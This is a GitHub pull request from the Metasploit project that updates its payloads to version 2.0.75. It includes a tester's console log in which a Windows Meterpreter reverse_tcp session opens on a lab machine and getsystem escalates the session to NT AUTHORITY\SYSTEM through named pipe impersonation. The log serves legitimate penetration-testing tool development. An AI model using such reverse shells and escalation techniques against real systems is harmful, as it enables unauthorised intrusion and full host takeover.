Update metasploit payloads to 2.0.75 #16215

Merged: 1 commit, Feb 24, 2022

bwatters-r7
Contributor

This PR updates the payloads version to 2.0.75, taking in the changes landed in rapid7/metasploit-payloads#542.
See the payloads PR for testing instructions.

@bwatters-r7 bwatters-r7 self-assigned this Feb 23, 2022
@bwatters-r7
Contributor Author

msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200262 bytes) to 10.5.132.153
[*] Meterpreter session 1 opened (10.5.135.101:4578 -> 10.5.132.153:49676 ) at 2022-02-24 10:47:44 -0600

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10X64-1511
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10X64-1511\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > sysinfo
Computer        : WIN10X64-1511
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.5.132.153 - Meterpreter session 1 closed.  Reason: User exit
msf6 payload(windows/x64/meterpreter/reverse_tcp) > 
[*] Sending stage (200262 bytes) to 10.5.132.153
[*] Meterpreter session 2 opened (10.5.135.101:4578 -> 10.5.132.153:49686 ) at 2022-02-24 10:49:48 -0600

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN10X64-1511
OS              : Windows 10 (10.0 Build 10586).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

For my future edification:
[image]

@bwatters-r7 bwatters-r7 merged commit 1e4e146 into rapid7:master Feb 24, 2022
@bwatters-r7
Contributor Author

Release Notes

This PR updates the payloads version to 2.0.75, taking in the changes landed in rapid7/metasploit-payloads#542, and fixes a bug in the Windows Meterpreter getsystem command where a failed attempt to elevate can result in a partially-broken session.

@bwatters-r7 bwatters-r7 added bug payload rn-fix release notes fix and removed bug labels Feb 24, 2022
@bwatters-r7 bwatters-r7 deleted the bump-payloads-2.0.75 branch March 24, 2022 21:03